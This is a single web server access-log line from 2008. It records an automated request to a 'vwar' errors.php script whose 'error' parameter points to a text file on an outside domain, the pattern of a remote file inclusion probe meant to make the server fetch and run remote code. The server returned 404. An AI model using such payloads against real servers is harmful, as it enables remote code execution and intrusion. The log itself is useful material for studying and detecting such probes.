58.102.118.201 - - [07/Aug/2008:09:21:18 -0500] "GET ///vwar/backup/errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
